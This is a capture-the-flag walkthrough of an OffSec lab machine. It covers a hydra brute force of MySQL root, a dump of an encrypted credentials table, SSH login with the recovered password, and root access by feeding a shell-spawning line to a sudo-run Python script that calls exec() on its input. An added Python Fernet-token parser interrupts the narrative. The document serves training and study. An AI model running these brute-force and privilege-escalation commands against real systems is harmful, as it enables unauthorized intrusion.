Py Exp Walkthrough offsec

Room link https://portal.offsec.com/labs/play

Enumeration

I initiated a Rustscan scan and discovered the open ports.

Port 80 is not open, so the attack surface is drastically reduced.

A MySQL service is running on port 3306, so let's do ENUMERATION on MySQL.

MYSQL BRUTE FORCE USING HYDRA.

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.160.118

If using 'root' as the username was unsuccessful, our next step would be to attempt using 'admin' instead.

I got the password of the MySQL user root, which is prettywomen. [root:prettywomen]

MYSQL ENUMERATION:

Log in to MySQL:

mysql -h 192.168.160.118 -u root -p
show databases;
use data;
show tables;
select * from fernet;

The data looked base64 encoded, but decoding it yielded nothing usable. However, since Fernet is a symmetric encryption scheme, I used the key and ciphertext from the table with an online decryptor and recovered a set of credentials.
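As an added example that is not part of this walkthrough: a plain base64 decode of the fernet column "yields nothing" because a Fernet token is a binary structure (version byte, timestamp, IV, AES-128-CBC ciphertext, HMAC-SHA256 tag), not encoded text. The standard-library parser below unpacks that structure and verifies the tag with the key, so you can confirm offline that a key belongs to a token without pasting database secrets into a web decryptor; the keys and token here are constructed for illustration, and the remaining AES-CBC step is what the cryptography library's Fernet class performs.

```python
import base64
import hashlib
import hmac
import struct

# Constructed demo keys (not the key stored in the lab database).
SAMPLE_KEY = base64.urlsafe_b64encode(bytes(range(32)))
OTHER_KEY = base64.urlsafe_b64encode(bytes(32))

def parse_fernet_token(token, key):
    """Decode a Fernet token and verify its HMAC tag with `key`.
    Layout after urlsafe-base64 decoding:
      0x80 | timestamp (8, big-endian) | IV (16) | AES-128-CBC ciphertext | HMAC-SHA256 (32)
    The 32-byte key is signing key (first 16) + encryption key (last 16).
    Raises ValueError if the token is malformed or the tag does not match (wrong key or tampered)."""
    raw_key = base64.urlsafe_b64decode(key)
    if len(raw_key) != 32:
        raise ValueError("Fernet key must decode to 32 bytes")
    data = base64.urlsafe_b64decode(token)
    if len(data) < 1 + 8 + 16 + 32 or data[0] != 0x80:
        raise ValueError("not a Fernet token")
    body, tag = data[:-32], data[-32:]
    expected = hmac.new(raw_key[:16], body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time compare
        raise ValueError("HMAC mismatch: wrong key or tampered token")
    ciphertext = data[25:-32]
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("ciphertext is not whole AES blocks")
    return {
        "timestamp": struct.unpack(">Q", data[1:9])[0],
        "iv": data[9:25],
        "ciphertext": ciphertext,
        "encryption_key": raw_key[16:],  # AES-128-CBC key for the last step
    }

def key_matches_token(token, key):
    """True only when `key` verifies the token's HMAC."""
    try:
        parse_fernet_token(token, key)
        return True
    except ValueError:
        return False

def build_sample_token(key, ciphertext, timestamp):
    """Build a structurally valid token around constructed (unencrypted) bytes; parser demo only."""
    raw_key = base64.urlsafe_b64decode(key)
    body = b"\x80" + struct.pack(">Q", timestamp) + bytes(16) + ciphertext
    tag = hmac.new(raw_key[:16], body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag)
```

A tag mismatch before any decryption is the quickest sign that the key you pulled does not belong to the token, or that the stored value was altered.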

I used the new credentials to access the SSH server.

username: lucy, password: wJ9`"Lemdv9[FEw-

ssh lucy@192.168.160.118 -p 1337

I got the flag in user.txt.

PRIVILEGE ESCALATION

I tried many different techniques without success. Then I looked at /opt/exp.py:

cat /opt/exp.py

uinput = raw_input('how are you?')   # reads one line from the user
exec(uinput)                          # runs that line as Python code

So the plan is to run exp.py with sudo under Python 2 and, at its prompt, type a line that spawns a shell, such as import os; os.system("/bin/sh"); exec() then runs it with the privileges sudo granted. I used:

import pty;pty.spawn('/bin/bash')

Thanks for visiting.
